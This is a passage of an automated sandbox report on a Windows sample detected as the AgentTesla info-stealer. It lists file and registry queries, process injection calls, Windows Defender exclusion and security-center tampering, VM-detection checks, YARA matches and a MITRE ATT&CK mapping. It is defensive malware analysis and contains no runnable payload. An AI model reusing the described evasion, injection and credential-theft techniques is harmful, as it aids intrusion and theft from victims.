                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000010.00000002.556137517.0000022F49629000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.25.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.29.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e21420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38b97a0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.39197e0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e81c80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.28.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.31.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e41440.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.39197e0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.25.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.29.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e21420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38b97a0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.39197e0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e81c80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.28.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.31.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e41440.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.39197e0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation331Startup Items1Startup Items1Disable or Modify Tools211OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1DLL Side-Loading1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery134Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Application Shimming1DLL Side-Loading1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution2Windows Service1Application Shimming1Timestomp1NTDSSecurity Software Discovery461Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronRegistry Run Keys / Startup Folder321Access Token Manipulation1DLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion261SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonWindows Service1Masquerading221Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsProcess Injection212Virtualization/Sandbox Evasion261DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobRegistry Run Keys / Startup Folder321Access Token Manipulation1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 483863 Sample: VknMvPoCXZ Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 60 Multi AV Scanner detection for dropped file 2->60 62 Sigma detected: Powershell adding suspicious path to exclusion list 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 9 other signatures 2->66 7 VknMvPoCXZ.exe 9 11 2->7         started        11 svchost.exe 2->11         started        13 481F404B.exe 2->13         started        16 9 other processes 2->16 process3 dnsIp4 42 C:\Windows\Resources\Themes\...\svchost.exe, PE32 7->42 dropped 44 C:\Users\user\AppData\...\481F404B.exe, PE32 7->44 dropped 46 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 7->46 dropped 54 2 other files (1 malicious) 7->54 dropped 74 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->74 76 Creates autostart registry keys with suspicious names 7->76 78 Drops PE files to the startup folder 7->78 86 4 other signatures 7->86 18 aspnet_compiler.exe 7->18         started        21 481F404B.exe 7->21         started        24 WerFault.exe 7->24         started        28 9 other processes 7->28 48 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 11->48 dropped 80 Multi AV Scanner detection for dropped file 11->80 82 Adds a directory exclusion to Windows Defender 11->82 56 192.168.2.1 unknown unknown 13->56 50 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 13->50 dropped 58 127.0.0.1 unknown unknown 16->58 52 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 16->52 dropped 84 Changes security center settings (notifications, updates, antivirus, firewall) 16->84 26 WerFault.exe 16->26         started        file5 signatures6 process7 file8 68 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->68 70 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->70 38 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 21->38 dropped 72 Adds a directory exclusion to Windows Defender 21->72 40 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 24->40 dropped 30 AdvancedRun.exe 28->30         started        32 conhost.exe 28->32         started        34 conhost.exe 28->34         started        36 6 other processes 28->36 signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      VknMvPoCXZ.exe48%VirustotalBrowse
                      VknMvPoCXZ.exe44%ReversingLabsWin32.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe0%ReversingLabs
